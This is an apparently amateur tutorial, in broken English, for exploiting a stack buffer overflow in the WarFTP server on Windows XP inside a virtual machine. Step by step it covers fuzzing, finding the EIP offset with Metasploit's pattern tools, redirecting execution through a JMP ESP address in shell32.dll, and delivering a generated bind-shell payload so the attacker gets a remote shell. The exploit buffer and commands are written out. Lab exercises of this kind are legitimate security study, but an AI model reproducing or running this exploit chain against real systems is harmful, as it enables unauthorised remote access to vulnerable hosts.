Buffer overflow : war - FTP

Ok, now we try to learn about buffer overflow.
Buffer overflow is a process that does not normally happen in because the data is stored exceeds the capacity of the memory buffer, so there haved vulnerable for entered to system. follow step by step .

1. Run your windows xp on virtualBox or VMware
2. Run warFTP 

3. open console and type
#nc ip port
this for check server is running

4. next step is make fuzzer. fuzzer is app from python for make the data doesn't normal and error. here we make the fuzz.py used nano.

 5. run the command for execute fuzzer
#python fuzz.py

 fuzzer is success and warFTP is loss from screen.
6. Now we do the debugger for look the data that occurs.
for debugger, we used Ollydbg . next run Ollydbg and open warFTP via Ollydbg.
if the warFTP can't running. you make the new user on warFTP.  select user security properties > add .
after user have maked, run again warFTP and look register on Ollydbg

7. next we make the development vulnerability use pattern_craete.
#cd /opt/metasploit/msf3/tools
#./pattern_create.rb 1000 > data.txt
open data.txt via text editor and look the data.

8. next step input data in data.txt to fuzzer has been made.

run warFTP again via Ollydbg and run fuzzer . look the register of Ollydbg

 9. after make crash to app, next we search how byte string befall register.
for this step, we used tools pattern_offset via console.
#./pattern_offset.rb 32714131
#./pattern_offset.rb q4Aq5Aq

for reach EIP register, need data 485 byte and reach stack need data 493 byte.

10. next step for see the EIP overwrite, edit fuzzer.
add :
nilaiEIP = "\x90" * 485
nilaiEIP+ = "\xEF\xBE\xAD\xDE"

between import socket and s.connect

 11. run warFTP via Ollydbg + run fuzzer again
look result of register has changed

after EIP, next to ESP..step is same just edit fuzzer.
add :
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\90" * (493-len(buffer))
buffer+= "\xCC" * (1000-len(buffer))
between import socket and s.connect

12.next step look the window register and stack
all data have \xCC

13. now you have controll stack, next step how to execute payload
on Ollydbg, select view > Executable modules
on modules have out library used by warFTP,next select library for jup to register EIP, here i used shell32.dll
next, we search command JMP ESP on that file for do this click right on main window ->search for-> command

14. after search JMP ESP and find that, we must know address..on this case, address is 7CA58265..
next edit fuzzer line 5..
buffer+= "\x65\x82\xA5\x7C"
like that, run warFTP via Ollydbg and run fuzzer again.

here value of register EIP 00A5FD59 not 7ca58265 again.

15. Now debugging process used breakpoint for analysis malware.

16. now make payload to enter on buffer
 #cd /pentest/exploit/framework2
#./msfweb
open browser and type -> 127.0.0.1:55555

next click payloads > os::win32 on filter modules > windows blind shell

click generate.
17. copy file to fuzzer

run warFTP without used Ollydbg and run fuzzer
final step #telnet ip port

FINISH :) <THANKS GOD>